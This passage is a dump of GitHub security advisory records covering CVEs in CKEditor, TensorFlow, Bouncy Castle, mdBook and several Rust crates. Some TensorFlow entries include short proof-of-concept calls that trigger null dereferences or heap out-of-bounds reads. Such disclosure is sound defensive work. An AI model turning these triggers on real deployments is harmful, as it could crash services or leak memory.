CKEditor 4 team would like to thank Anton Subbotin ([skavans](https://github.com/skavans)) for recognizing and reporting this vulnerability. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ckeditor4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.13.0'}, {'fixed': '4.16.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-6226-h7ff-ch6c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32808'}, {'type': 'PACKAGE', 'url': 'https://github.com/ckeditor/ckeditor4'}, {'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor4/releases/tag/4.16.2'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NYA354LJP47KCVJMTUO77ZCX3ZK42G3T/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UVOYN2WKDPLKCNILIGEZM236ABQASLGW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAGNWHFIQAVCP537KFFS2A2GDG66J7XD/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T16:49:07Z', 'nvd_published_at': '2021-08-12T17:15:00Z'}" +1.4.0,GHSA-hf6p-4rv2-9qrp,2021-08-26T15:45:24Z,2021-08-30T16:25:42Z,,['CVE-2021-23423'],Path Traversal in bikshed,"This affects the package bikeshed before 3.0.0. This can occur when an untrusted source file containing include, include-code or include-raw block is processed. The contents of arbitrary files could be disclosed in the HTML output.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'bikeshed'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23423'}, {'type': 'WEB', 'url': 'https://github.com/tabatkins/bikeshed/commit/b2f668fca204260b1cad28d5078e93471cb6b2dd'}, {'type': 'PACKAGE', 'url': 'https://github.com/tabatkins/bikeshed'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-BIKESHED-1537647'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T15:45:24Z', 'nvd_published_at': '2021-08-16T08:15:00Z'}" +1.4.0,GHSA-4hjg-cx88-g9f9,2023-06-13T18:10:45Z,2021-08-25T20:49:58Z,,['CVE-2020-35915'],Data races in futures-intrusive,"GenericMutexGuard was given the Sync auto trait as long as T is Send due to its contained members. However, since the guard is supposed to represent an acquired lock and allows concurrent access to the underlying data from different threads, it should only be Sync when the underlying data is. + +This is a soundness issue and allows data races, potentially leading to crashes and segfaults from safe Rust code. + +The flaw was corrected by adding a T: Send + Sync bound for GenericMutexGuard's Sync trait.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'futures-intrusive'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35915'}, {'type': 'WEB', 'url': 'https://github.com/Matthias247/futures-intrusive/issues/53'}, {'type': 'PACKAGE', 'url': 'https://github.com/Matthias247/futures-intrusive'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0072.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:49:04Z', 'nvd_published_at': None}" +1.4.0,GHSA-6xx3-rg99-gc3p,2021-05-21T17:50:36Z,2021-08-13T15:22:31Z,,['CVE-2020-15522'],Timing based private key exposure in Bouncy Castle,"Bouncy Castle BC Java before 1.66, BC C# .NET before 1.8.7, BC-FJA before 1.0.2.1, BC before 1.66, BC-FNA before 1.0.1.1 have a timing issue within the EC math library that can expose information about the private key when an attacker is able to observe timing information for the generation of multiple deterministic ECDSA signatures.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bc-fips'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.2'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-ext-jdk15on'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.66'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-ext-jdk16'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.66'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk14'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.66'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk15'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.66'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk15on'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.66'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk15to18'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.66'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk16'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.66'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'BouncyCastle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15522'}, {'type': 'WEB', 'url': 'https://github.com/bcgit/bc-csharp/wiki/CVE-2020-15522'}, {'type': 'WEB', 'url': 'https://github.com/bcgit/bc-java/wiki/CVE-2020-15522'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210622-0007/'}, {'type': 'WEB', 'url': 'https://www.bouncycastle.org/releasenotes.html'}]","{'cwe_ids': ['CWE-203', 'CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T17:50:36Z', 'nvd_published_at': '2021-05-20T12:15:00Z'}" +1.4.0,GHSA-jrcf-4jp8-m28v,2023-06-13T18:42:34Z,2021-08-25T20:50:35Z,,['CVE-2020-35921'],miow invalidly assumes the memory layout of std::net::SocketAddr,"The miow crate has assumed std::net::SocketAddrV4 and std::net::SocketAddrV6 have the same memory layout as the system C representation sockaddr. It has simply casted the pointers to convert the socket addresses to the system representation. The standard library does not say anything about the memory layout, and this will cause invalid memory access if the standard library changes the implementation. No warnings or errors will be emitted once the change happens.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'miow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.0'}, {'fixed': '0.3.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35921'}, {'type': 'WEB', 'url': 'https://github.com/yoshuawuyts/miow/issues/38'}, {'type': 'WEB', 'url': 'https://github.com/yoshuawuyts/miow/pull/39'}, {'type': 'WEB', 'url': 'https://github.com/yoshuawuyts/miow/pull/40'}, {'type': 'PACKAGE', 'url': 'https://github.com/yoshuawuyts/miow'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0080.html'}]","{'cwe_ids': ['CWE-188'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:54:07Z', 'nvd_published_at': None}" +1.4.0,GHSA-mvvp-gwgc-5hrp,2021-08-31T21:21:23Z,2021-08-02T17:30:27Z,,['CVE-2021-23407'],Path Traversal in elFinder.Net.Core,This affects the package elFinder.Net.Core from 0 and before 1.2.4. The user-controlled file name is not properly sanitized before it is used to create a file system path.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'elFinder.Net.Core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23407'}, {'type': 'WEB', 'url': 'https://github.com/trannamtrung1st/elFinder.Net.Core/commit/5498c8a86b76ef089cfbd7ef8be014b61fa11c73'}, {'type': 'PACKAGE', 'url': 'https://github.com/trannamtrung1st/elFinder.Net.Core'}, {'type': 'WEB', 'url': 'https://github.com/trannamtrung1st/elFinder.Net.Core/releases/tag/all-1.2.4'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-DOTNET-ELFINDERNETCORE-1315152'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-15T18:45:24Z', 'nvd_published_at': '2021-07-14T17:15:00Z'}" +1.4.0,GHSA-c9qf-r67m-p7cg,2021-08-23T17:58:44Z,2021-08-25T14:44:12Z,,['CVE-2021-37637'],Null pointer dereference in `CompressElement`,"### Impact +It is possible to trigger a null pointer dereference in TensorFlow by passing an invalid input to `tf.raw_ops.CompressElement`: + +```python +import tensorflow as tf + +tf.raw_ops.CompressElement(components=[[]]) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/47a06f40411a69c99f381495f490536972152ac0/tensorflow/core/data/compression_utils.cc#L34) was accessing the size of a buffer obtained from the return of a separate function call before validating that said buffer is valid. + +### Patches +We have patched the issue in GitHub commit [5dc7f6981fdaf74c8c5be41f393df705841fb7c5](https://github.com/tensorflow/tensorflow/commit/5dc7f6981fdaf74c8c5be41f393df705841fb7c5). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360. Concurrently, it was resolved in `master` branch as it was also discovered internally and fixed before the report was handled.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-c9qf-r67m-p7cg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37637'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/5dc7f6981fdaf74c8c5be41f393df705841fb7c5'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T17:58:44Z', 'nvd_published_at': '2021-08-12T19:15:00Z'}" +1.4.0,GHSA-7qcc-g2m9-8533,2021-08-19T17:22:29Z,2021-08-25T20:53:53Z,,['CVE-2021-28307'],Null pointer deference in fltk,An issue was discovered in the fltk crate before 0.15.3 for Rust. There is a NULL pointer dereference during attempted use of a non-raster image for a window icon.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'fltk'}, 'ecosystem_specific': {'affected_functions': ['fltk::prelude::WindowExt::set_icon']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.15.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28307'}, {'type': 'WEB', 'url': 'https://github.com/MoAlyousef/fltk-rs/issues/519'}, {'type': 'PACKAGE', 'url': 'https://github.com/MoAlyousef/fltk-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0038.html'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:22:29Z', 'nvd_published_at': None}" +1.4.0,GHSA-g489-xrw3-3v8w,2021-08-19T18:51:25Z,2021-08-25T20:50:46Z,,['CVE-2020-36207'],Data races in aovec,"An issue was discovered in the aovec crate through 2020-12-10 for Rust. Because Aovec does not have bounds on its Send trait or Sync trait, a data race and memory corruption can occur.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'aovec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36207'}, {'type': 'PACKAGE', 'url': 'https://github.com/krl/aovec'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0099.html'}]","{'cwe_ids': ['CWE-662', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:51:25Z', 'nvd_published_at': None}" +1.4.0,GHSA-pwhf-7427-9vv2,2023-06-13T16:46:48Z,2021-08-25T20:56:57Z,,['CVE-2020-36468'],Non-atomic writes in cgc,"# Multiple soundness issues in `Ptr` in cgc + +Affected versions of this crate have the following issues: + +1. `Ptr` implements `Send` and `Sync` for all types, this can lead to data + races by sending non-thread safe types across threads. + +2. `Ptr::get` violates mutable alias rules by returning multiple mutable + references to the same object. + +3. `Ptr::write` uses non-atomic writes to the underlying pointer. This means + that when used across threads it can lead to data races.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'cgc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36468'}, {'type': 'WEB', 'url': 'https://github.com/playXE/cgc/issues/5'}, {'type': 'PACKAGE', 'url': 'https://github.com/playXE/cgc'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/cgc/RUSTSEC-2020-0148.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0148.html'}]","{'cwe_ids': ['CWE-657'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:39:03Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-ppqp-78xx-3r38,2022-04-26T18:11:53Z,2021-08-25T20:53:25Z,,['CVE-2021-26951'],Out of bounds write in calamine,"An issue was discovered in the calamine crate before 0.17.0 for Rust. It allows attackers to overwrite heap-memory locations because Vec::set_len is used without proper memory claiming, and this uninitialized memory is used for a user-provided Read operation, as demonstrated by Sectors::get.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'calamine'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26951'}, {'type': 'WEB', 'url': 'https://github.com/tafia/calamine/issues/199'}, {'type': 'PACKAGE', 'url': 'https://github.com/tafia/calamine'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0015.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:35:56Z', 'nvd_published_at': '2021-02-09T23:15:00Z'}" +1.4.0,GHSA-g8wg-cjwc-xhhp,2021-08-24T16:17:59Z,2021-08-25T14:41:00Z,,['CVE-2021-37679'],Heap OOB in nested `tf.map_fn` with `RaggedTensor`s,"### Impact +It is possible to nest a `tf.map_fn` within another `tf.map_fn` call. However, if the input tensor is a `RaggedTensor` and there is no function signature provided, code assumes the output is a fully specified tensor and fills output buffer with uninitialized contents from the heap: + +```python +import tensorflow as tf +x = tf.ragged.constant([[1,2,3], [4,5], [6]]) +t = tf.map_fn(lambda r: tf.map_fn(lambda y: r, r), x) +z = tf.ragged.constant([[[1,2,3],[1,2,3],[1,2,3]],[[4,5],[4,5]],[[6]]]) +``` + +The `t` and `z` outputs should be identical, however this is not the case. The last row of `t` contains data from the heap which can be used to leak other memory information. + +The bug lies in the conversion from a `Variant` tensor to a `RaggedTensor`. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/ragged_tensor_from_variant_op.cc#L177-L190) does not check that all inner shapes match and this results in the additional dimensions in the above example. + +The same implementation can result in data loss, if input tensor is tweaked: + +```python +import tensorflow as tf +x = tf.ragged.constant([[1,2], [3,4,5], [6]]) +t = tf.map_fn(lambda r: tf.map_fn(lambda y: r, r), x) +``` + +Here, the output tensor will only have 2 elements for each inner dimension. + +### Patches +We have patched the issue in GitHub commit [4e2565483d0ffcadc719bd44893fb7f609bb5f12](https://github.com/tensorflow/tensorflow/commit/4e2565483d0ffcadc719bd44893fb7f609bb5f12). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Haris Sahovic.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-g8wg-cjwc-xhhp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37679'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/4e2565483d0ffcadc719bd44893fb7f609bb5f12'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125', 'CWE-681'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T16:17:59Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-7fvx-3jfc-2cpc,2021-08-24T12:55:28Z,2021-08-25T14:42:58Z,,['CVE-2021-37655'],Heap OOB in `ResourceScatterUpdate`,"### Impact +An attacker can trigger a read from outside of bounds of heap allocated data by sending invalid arguments to `tf.raw_ops.ResourceScatterUpdate`: + +```python +import tensorflow as tf + +v = tf.Variable([b'vvv']) +tf.raw_ops.ResourceScatterUpdate( + resource=v.handle, + indices=[0], + updates=['1', '2', '3', '4', '5']) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/resource_variable_ops.cc#L919-L923) has an incomplete validation of the relationship between the shapes of `indices` and `updates`: instead of checking that the shape of `indices` is a prefix of the shape of `updates` (so that broadcasting can happen), code only checks that the number of elements in these two tensors are in a divisibility relationship. + +### Patches +We have patched the issue in GitHub commit [01cff3f986259d661103412a20745928c727326f](https://github.com/tensorflow/tensorflow/commit/01cff3f986259d661103412a20745928c727326f). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-7fvx-3jfc-2cpc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37655'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/01cff3f986259d661103412a20745928c727326f'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T12:55:28Z', 'nvd_published_at': '2021-08-12T21:15:00Z'}" +1.4.0,GHSA-gx5w-rrhp-f436,2021-08-18T21:06:53Z,2021-08-25T20:56:20Z,,['CVE-2020-26297'],XSS in mdBook,"> This is a cross-post of [the official security advisory][ml]. The official post contains a signed version with our PGP key, as well. + +[ml]: https://groups.google.com/g/rustlang-security-announcements/c/3-sO6of29O0 + +The Rust Security Response Working Group was recently notified of a security issue affecting the search feature of mdBook, which could allow an attacker to execute arbitrary JavaScript code on the page. + +The CVE for this vulnerability is [CVE-2020-26297](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26297). + +## Overview + +The search feature of mdBook (introduced in version 0.1.4) was affected by a cross site scripting vulnerability that allowed an attacker to execute arbitrary JavaScript code on an user's browser by tricking the user into typing a malicious search query, or tricking the user into clicking a link to the search page with the malicious search query prefilled. + +mdBook 0.4.5 fixes the vulnerability by properly escaping the search query. + +## Mitigations + +Owners of websites built with mdBook have to upgrade to mdBook 0.4.5 or greater and rebuild their website contents with it. It's possible to install mdBook 0.4.5 on the local system with: + +``` +cargo install mdbook --version 0.4.5 --force +``` + +## Acknowledgements + +Thanks to Kamil Vavra for responsibly disclosing the vulnerability to us according to [our security policy](https://www.rust-lang.org/policies/security). + +## Timeline of events + +All times are listed in UTC. + +- 2020-12-30 20:14 - The issue is reported to the Rust Security Response WG +- 2020-12-30 20:32 - The issue is acknowledged and the investigation began +- 2020-12-30 21:21 - Found the cause of the vulnerability and prepared the patch +- 2021-01-04 15:00 - Patched version released and vulnerability disclosed","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'mdBook'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.1.4'}, {'fixed': '0.4.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rust-lang/mdBook/security/advisories/GHSA-gx5w-rrhp-f436'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26297'}, {'type': 'WEB', 'url': 'https://github.com/rust-lang/mdBook/commit/32abeef088e98327ca0dfccdad92e84afa9d2e9b'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-lang/mdBook'}, {'type': 'WEB', 'url': 'https://github.com/rust-lang/mdBook/blob/master/CHANGELOG.md#mdbook-045'}, {'type': 'WEB', 'url': 